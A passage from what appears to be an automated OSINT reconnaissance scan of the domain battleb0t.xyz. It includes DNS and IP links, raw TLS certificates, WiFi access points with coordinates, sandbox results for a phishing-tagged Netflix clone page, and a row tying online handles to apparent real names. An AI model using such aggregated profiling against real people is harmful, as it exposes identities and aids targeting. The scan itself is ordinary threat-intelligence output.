GeckoAccept-Encoding: gzip\n deflateHost: uploads-ssl.webflow.comDNT: 1Connection: Keep-Alive" (Indicator: "youtube")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar2FA0.tmp" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"5f774173a2f6f8720a80d3d7_decor-dots_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d0e96629fb1faee847_mob_app%20store_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "6305c4d096183ee5c61f2081_mob_google%20play_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff60f8b3be007f3ef5780f3_Cover%20AML%20risk%20screening_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5f774173a2f6f8ffce80d3d6_decor-rows_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff5c5146d1b1ad22260e36b_seamless-integration_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c611b6f7021b7a90b6_nav-healthcare_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2b5847afb666a7db5b8_nav-kyb_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5ff61e3603c269bbe2a4fd83_Powerfull-transactions_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2ac6d2755267bbee952_nav-anti-money-laundering_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "63c5d399b50c403dd6ef8a71_icon_solutions_1_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c51ee3b2917a9fc9d3_nav-financial-services_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "5fb4d2c73 | 185.199.109.153 |
| 2023-05-12 02:44:32 | Affiliate - Internet Name | No | DNS Resolver | 2 | 0 | 2 | 0 | None | cdn-185-199-108-153.github.com | 185.199.108.153 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | 7622 0155 (Net ID: 00:00:C5:F9:20:A8) | 32.8608, -79.9746 |
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Duolingo (Category: hobby)
https://www.duolingo.com/profile/Altpapier | Altpapier |
| 2023-05-12 03:18:59 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ^D^M^L^W^]^C^A^U^M^Y^E^L^_^R^G (Net ID: 00:05:5D:D9:90:56) | 33.617190550339146,-111.90827887019054 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.125 | 35.229.48.116 |
| 2023-05-12 02:48:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [u'phishing'], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'https://habby-bit.github.io/netflixclone', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'http://habby-bit.github.io/NetflixClone/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_cc8_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_cc8_IESQMMUTEX_0_519"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "UpdatingNewTabPageData"\n "IsoScope_cc8_IESQMMUTEX_0_331"\n "IsoScope_cc8_ConnHashTable<3272>_HashTable_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_cc8_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3272"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3272"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:80"\n "185.199.110.153:443"\n "104.18.23.52:443"\n "172.64.101.10:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"habby-bit.github.io"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"habby-bit.github.io"\n "ka-f.fontawesome.com"\n "kit.fontawesome.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<p class="text-dark">Watch right on Netflix.com</p>" (Indicator: "netflix.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "background_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 progressive precision 8 2000x1125 components 3"- [targetUID: N/A]\n "tab-content-2-1_1_.png" has type "PNG image data 561 x 379 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free-fa-solid-900_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Solid family"- [targetUID: N/A]\n "tab-content-2-3_1_.png" has type "PNG image data 552 x 338 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-1_1_.png" has type "PNG image data 915 x 649 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "tab-content-2-2_1_.png" has type "PNG image data 488 x 312 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "free.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "free-fa-regular-400_1_.eot" has type "Embedded OpenType (EOT) Font Awesome 5 Free Regular family"- [targetUID: N/A]\n "free-v4-shims.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "~DF4963DA67E64EB8AA.TMP" has type "data"- Location: [%TEMP%\\~DF4963DA67E64EB8AA.TMP]- [targetUID: 00000000-00003272]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00003272]\n "~DFF31E5E821B61D096.TMP" has type "data"- Location: [%TEMP%\\~DFF31E5E821B61D096.TMP]- [targetUID: 00000000-00003272]\n "~DF42C5F4D22EAE6326.TMP" has type "data"- Location: [%TEMP%\\~DF42C5F4D22EAE6326.TMP]- [targetUID: 00000000-00003272]\n "~DF20A640065AD00792.TMP" has type "data"- Location: [%TEMP%\\~DF20A640065AD00792.TMP]- [targetUID: 00000000-00003272]\n "~DF17599AD0A6701A34.TMP" has type "data"- Location: [%TEMP%\\~DF17599AD0A6701A34.TMP]- [targetUID: 00000000-00003272]\n "NetflixClone_2_.htm" has type "HTML document ASCII text"- [targetUID: N/A]\n "style_1_.css" has type "assembler source ASCII text"- [targetUID: N/A]\n "logo_1_.png" has type "PNG image data 329 x 88 8-bit/color RGBA non-interlaced"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'Network Traffic', u'identifier': u'network-62', u'name': u'Communicates with HTTP webserver (GET/POST requests)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'Found http requests in header "GET /NetflixClone/"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "http://habby-bit.github.io/NetflixClone/"\n Pattern match: "http://habby-bit.github.io"\n Pattern match: "SUIDMmicrosoft.com/921636467187231027693355855405031027575*MUID0C1B981BC3486B7C30C18AEDC2046A44microsoft.com/102549716108831106047355902280031027575*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA694"\n Pattern match: "MUIDB0C1B981BC3486B7C30C18AEDC2046A44ieonline.microsoft.com/921649716108831106047355933530031027575*"\n Pattern match: "https://kit.fontawesome.com/098a7050d2.js"\n Pattern match: "https://fontawesome.com"\n Pattern match: "https://fontawesome.com/license/free"\n Pattern match: "SUIDMmicrosoft.com/921636467187231027693355855405031027575*MUID0C1B981BC3486B7C30C18AEDC2046A44microsoft.com/102549716108831106047355902280031027575*_EDGE_V1microsoft.com/921649716108831106047355949155031027575*SRCHDAF=NOFORMmicrosoft.com/10243323789440310"\n Pattern match: "MUID19FA43693F9268132655519F3E166994msn.com/102550716108831106047397246030031027575*"\n Pattern match: "SUIDMmicrosoft.com/921636467187231027693355855405031027575*SRCHDAF=NOFORMmicrosoft.com/102433237894403108561027971357230938743*SRCHUIDV=2&GUID=426377958C8445E3B4EA69482BD0E747&dmnchg=1microsoft.com/102433237894403108561027971357230938743*SRCHUSRDOB=2022013"\n Pattern match: "isdomainmigratedtruewww.msn.com/1025140058060831063802397136655031027575*"\n Pattern match: "www.msn.com/"\n Heuristic match: "habby-bit.github.io"\n Heuristic match: "ka-f.fontawesome.com"\n Heuristic match: "kit.fontawesome.com"\n Pattern match: "https://habby-bit.github.io/NetflixClone/Accept-Language"\n Heuristic match: "GET /NetflixClone/ HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateDNT: 1Connection: Keep-AliveHost: habby-bit.github.io"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Heuristic match: "abby-bit.github.io"\n Pattern match: "habby-bit.github.io/NetflixClone/"\n Pattern match: "http://www.windows.com/pctv"\n Pattern match: "http://go.microsoft.com/fwlink/?linkid=53081"\n Pattern match: "www.microsoft.com/extender/help"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=30564-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwlink/?LinkId=145764-http://go.microsoft.com/fwl"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=70599"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145837"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkID=57190"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=145765"\n Heuristic match: "Example: computer.fabrikam.com"\n Pattern match: "vista.gallery.microsoft.com/vista/SideShow.aspx"\n Pattern match: "http://www.icra.org/vocabulary/"\n Pattern match: "wmploc.dll/Offline_Buy.htm\'res://wmploc.dll/Offline_MediaGuide.htm*res://wmploc.dll/Offline_Subscriptions.htm"\n Pattern match: "http://go.microsoft.com/fwlink/?LinkId=32146res://wmploc.dll/ICW_ErrorPage.htm"\n Pattern match: "wmploc.dll/Service_Initial.htm"\n Pattern match: "wmploc | 185.199.110.153 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | zoom (Net ID: 00:01:38:85:BD:08) | 37.7642, -122.3993 |
| 2023-05-12 02:44:07 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 1 | 0 | None | GitHub Pages | battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Chess.com (Category: gaming)
https://www.chess.com/member/login | login |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 5 | 0 | None | United States | Ashburn, Virginia, 20149, United States, North America |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | linksys (Net ID: 00:14:BF:93:D4:35) | 40.2024, 29.0398 |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:23:36:1a:72:6e:fc:71:09:49:b1:35:f9:b5:e5:28:80:de
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 13 12:52:05 2023 GMT
Not After : Jun 11 12:52:04 2023 GMT
Subject: CN=kekw.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:bd:f9:3b:c0:6f:f8:ab:e7:35:d5:ff:95:55:28:
87:2c:f3:42:5c:6a:f2:dc:b2:0f:7b:b2:97:bc:68:
c2:d8:25:b1:da:3c:de:c9:ee:4a:54:a6:08:c9:a0:
d5:34:39:c8:96:b7:d1:e3:5d:f3:2b:db:f7:37:5d:
57:65:f7:3d:16:c9:ad:d6:e6:bb:bc:97:c6:1c:bc:
c7:1d:a0:c9:cc:3a:d4:e1:69:37:d2:58:c2:fe:42:
4e:90:a6:4c:72:5e:0f:c5:0a:f9:18:b1:c7:54:af:
b4:03:13:bc:ce:85:b6:0d:a5:99:fc:98:b2:37:24:
39:66:7b:f1:78:3b:4b:9e:51:be:75:ad:a6:19:8d:
be:a9:ca:f2:df:b7:73:9f:c6:14:09:e1:46:c4:93:
a4:45:7c:eb:1e:47:42:88:d1:8d:e7:29:c0:07:7b:
ad:57:d3:0b:cf:a1:a1:bc:65:12:20:8e:92:81:50:
55:40:69:4e:0d:62:29:ab:00:e6:81:6e:83:3a:16:
09:da:2a:57:32:b1:5d:79:74:f0:1d:02:e0:52:6d:
d5:85:2d:cb:f6:ef:5e:8f:03:a0:14:64:19:bb:71:
65:85:3e:bc:4e:e8:75:85:4b:a0:7d:df:3f:2a:67:
46:82:ea:56:e3:e5:01:c8:49:e2:f1:a3:b1:04:af:
98:45:24:1b:7e:2d:57:39:72:ff:5a:94:89:31:42:
ae:19:e5:2d:eb:c8:08:fc:be:37:02:5d:04:1a:b3:
f0:62:42:14:91:38:7a:96:77:5e:53:eb:f1:d9:8e:
45:46:0d:65:07:6b:18:0a:65:96:3c:4e:b9:77:05:
52:b4:4d:17:73:72:d9:49:c8:16:75:9c:84:35:12:
73:86:4f:08:27:5d:f3:e9:85:10:9a:ff:e4:3a:63:
ef:83:9f:03:76:a4:3f:ac:72:d5:f4:bb:3a:60:bc:
21:1c:e8:7c:52:79:bd:fe:19:9a:69:78:22:a6:5d:
64:8d:04:55:f3:ec:4d:6c:47:45:2c:6c:9e:cc:14:
be:67:76:25:be:fd:51:60:a1:2e:10:af:1b:46:0c:
e9:ec:3a:3c:0b:c9:2a:97:61:1c:a8:6a:9d:53:cd:
2d:6c:4e:66:f4:08:01:29:89:61:ff:d2:73:d2:a1:
da:94:32:dc:5c:78:ad:19:fa:b3:fb:26:0f:35:c2:
87:17:c9:ae:6f:c7:ce:81:d6:7d:27:95:3b:49:39:
e6:cf:30:85:95:79:a1:35:71:86:5b:66:f7:9d:ae:
96:d5:9a:1d:e3:e0:76:fe:b7:a0:b5:1a:16:0b:1b:
5e:d4:d9:5b:b6:4a:4d:33:65:03:80:b9:ab:69:35:
1b:42:d7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
E6:0D:FB:5E:53:09:44:30:22:92:3D:83:C3:34:06:A0:52:1B:50:06
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:kekw.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 13 13:52:05.336 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:57:F9:C2:75:97:36:8B:12:D4:C1:E7:CA:
50:E7:70:49:3E:19:7B:CF:6E:2E:B2:32:0A:7B:AB:5D:
31:9F:A6:29:02:21:00:A5:FD:E1:03:A8:C4:49:20:AF:
46:1D:1E:50:E3:8E:07:43:7A:DC:16:22:84:DD:F5:8B:
28:06:E9:91:CB:AE:41
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 13 13:52:05.327 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:19:EA:4C:FF:35:E1:97:F0:36:1E:40:22:
0D:44:8D:BA:C6:F1:8F:73:35:1F:B7:67:97:EA:2B:1B:
FC:27:7F:33:02:21:00:81:59:F8:29:60:75:D8:8F:00:
60:06:8E:9A:65:C6:5E:93:57:7E:5C:BF:B5:78:29:4F:
6F:C1:3B:97:29:1D:C7
Signature Algorithm: sha256WithRSAEncryption
24:d6:1b:d8:e4:8b:66:d1:df:e9:e2:97:93:78:a9:26:b8:6c:
f8:3c:98:90:50:e1:55:d7:91:ae:77:21:2c:40:df:85:16:56:
67:98:1c:b9:14:ca:43:24:bf:39:32:06:c7:fe:42:03:fa:45:
3b:3f:39:c5:26:88:13:e9:3d:1d:bc:bd:a1:0a:08:74:1a:3b:
e6:07:80:5b:f5:9a:21:ed:4a:45:40:ac:8a:6d:c1:de:40:12:
47:d5:33:88:6e:06:c5:32:a1:76:01:b1:50:fb:53:29:92:fa:
e1:03:af:88:12:00:9a:38:a5:9d:32:3e:46:8b:7c:f6:27:29:
ec:fa:85:68:fa:91:a6:95:c5:d7:a0:da:33:eb:03:cf:9c:a6:
c0:5c:0d:e8:d8:f8:03:5d:fb:9f:61:df:e1:a0:63:74:01:18:
4c:0d:17:f3:db:74:32:3c:fc:3b:44:24:e7:10:2b:f7:69:d2:
89:35:6f:e7:d7:11:5a:13:0a:a9:83:9e:0f:c2:f2:ea:d8:50:
30:65:9c:16:49:f6:30:d8:a2:e3:83:ff:5d:ff:00:a2:ff:57:
de:68:f4:70:90:a3:db:c8:9c:55:ce:ea:f6:4c:08:6a:01:70:
91:f9:f8:91:9d:f2:99:1f:be:06:10:87:53:07:83:04:df:62:
62:3f:1f:52
| battleb0t.xyz |
| 2023-05-12 02:53:17 | IP Address | No | Mnemonic PassiveDNS | 0 | 0 | 1 | 0 | None | 172.67.135.9 | ayhu.xyz |
| 2023-05-12 02:44:14 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1 | pics.battleb0t.xyz |
| 2023-05-12 02:44:16 | IPv6 Address | No | DNS Resolver | 0 | 0 | 3 | 0 | None | 2606:4700:3037::6815:470e | oldfluid.battleb0t.xyz |
| 2023-05-12 03:03:19 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:10:b4:30:a3:e0:72:2f:ec:4e:bc:95:e3:12:bb:83:8d:6f
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=Let's Encrypt, CN=E1
Validity
Not Before: Dec 14 04:12:32 2022 GMT
Not After : Mar 14 04:12:31 2023 GMT
Subject: CN=*.ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
04:31:e0:5d:42:f2:be:35:60:b1:bf:3c:dd:6a:3a:
e9:66:ce:65:b9:42:55:e5:1f:5b:0f:4a:7d:d2:dd:
d5:d5:2a:c8:4c:26:cc:d6:24:4c:c6:8a:d7:5d:8d:
ad:45:7b:81:26:49:fc:64:c6:a9:da:25:d4:46:11:
f7:82:81:c2:c2
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:9F:0E:73:7B:4F:1D:9B:10:7F:DE:3A:BF:95:29:99:72:64:39:CE
X509v3 Authority Key Identifier:
keyid:5A:F3:ED:2B:FC:36:C2:37:79:B9:52:30:EA:54:6F:CF:55:CB:2E:AC
Authority Information Access:
OCSP - URI:http://e1.o.lencr.org
CA Issuers - URI:http://e1.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:*.ayhu.xyz, DNS:ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 14 05:12:32.135 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:20:3B:59:29:35:BE:AB:71:65:F9:96:06:4F:
5B:59:CE:57:24:54:B9:12:04:B5:DF:8A:07:E6:76:0F:
20:03:70:03:02:21:00:B7:78:F0:A2:3F:27:E7:3B:21:
C5:33:D6:55:11:C6:40:C1:C5:5B:26:28:AF:CA:56:1E:
26:52:58:CD:58:16:E5
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Dec 14 05:12:32.070 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:15:09:02:D4:FF:29:7B:0F:E9:E1:19:A4:
68:CC:B6:9A:5B:B7:91:A8:77:5F:34:7E:C8:58:7A:5D:
F7:C7:09:DA:02:20:1E:EF:33:8E:F5:7A:6D:A5:37:EA:
0D:F2:52:F7:31:2F:0F:C3:A2:0E:FC:59:37:68:C1:0E:
F3:7B:09:D9:73:6E
Signature Algorithm: ecdsa-with-SHA384
30:65:02:31:00:c4:f1:3e:03:59:6c:36:cb:84:da:12:51:f5:
76:a2:e4:bc:23:64:76:f4:b2:f0:4c:8f:9b:8b:90:fb:12:ce:
7b:42:97:0a:3a:61:32:82:0b:b0:21:2a:25:06:6a:5f:a9:02:
30:75:43:e3:50:ce:c6:89:24:bf:1b:e6:c4:50:fc:7d:e6:4e:
0c:28:05:6d:f7:e2:b6:59:55:90:02:80:b6:cc:fc:7e:93:a5:
f6:0f:4b:2a:01:37:a1:29:5b:b6:a5:1d:89
|
| 2023-05-12 03:09:28 | Open TCP Port | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | 87.248.157.102:443 | 87.248.157.102 |
| 2023-05-12 03:09:46 | Affiliate - Internet Name | No | DNS Resolver | 0 | 0 | 4 | 0 | None | 67.170.74.34.bc.googleusercontent.com | 34.74.170.67 |
| 2023-05-12 03:00:29 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.15): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.124): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:00:54 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.83): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SK_WiFi20D4 (Net ID: 00:01:36:9F:20:D5) | 34.0544, -118.244 |
| 2023-05-12 03:00:58 | Malicious Affiliate | Yes | VXVault.net | 0 | 1 | 3 | 0 | None | VXVault Malicious URL List [cdn-185-199-111-153.github.com]
http://vxvault.net/URL_List.php | cdn-185-199-111-153.github.com |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 101 (Net ID: 00:01:03:7C:1B:D2) | 37.7813933,-122.3918002 |
| 2023-05-12 02:44:07 | Co-Hosted Site | No | CertSpotter | 1 | 0 | 1 | 0 | None | sni.cloudflaressl.com | battleb0t.xyz |
| 2023-05-12 03:13:02 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0-ye.github.io]
https://www.openphish.com/feed.txt | 0-ye.github.io |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 15 | 0 | 0 | 0 | None | Battleb0t | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 02:54:07 | Raw Data from RIRs | No | Censys | 0 | 0 | 2 | 0 | None | {"last_updated_at": "2023-05-11T22:54:40.561Z", "ip": "2606:4700:3031::ac43:8709", "location_updated_at": "2023-05-06T00:44:41.372312Z", "autonomous_system_updated_at": "2023-05-07T11:38:36.576170Z", "location": {"province": "Illinois", "city": "Rosemont", "country": "United States", "coordinates": {"latitude": 41.99531, "longitude": -87.88451}, "postal_code": "60018", "country_code": "US", "timezone": "America/Chicago", "continent": "North America"}, "dns": {"records": {"faculdade.kennedy.br": {"record_type": "AAAA", "resolved_at": "2023-05-05T12:38:49.993145868Z"}, "resultscaraccidentlawyers.info": {"record_type": "AAAA", "resolved_at": "2023-04-24T17:51:50.273083754Z"}, "mail.atlas-media.net": {"record_type": "AAAA", "resolved_at": "2023-05-11T18:53:21.824413141Z"}, "dasecotibi.ml": {"record_type": "AAAA", "resolved_at": "2023-04-20T22:04:20.422633323Z"}, "unbeatableteams.com": {"record_type": "AAAA", "resolved_at": "2023-05-11T16:19:06.771575554Z"}, "ronnebytorget.se": {"record_type": "AAAA", "resolved_at": "2023-04-13T20:13:15.262547330Z"}, "www.cg.cncap.ca": {"record_type": "AAAA", "resolved_at": "2023-04-21T12:55:12.348140033Z"}, "nakedvampire.com": {"record_type": "AAAA", "resolved_at": 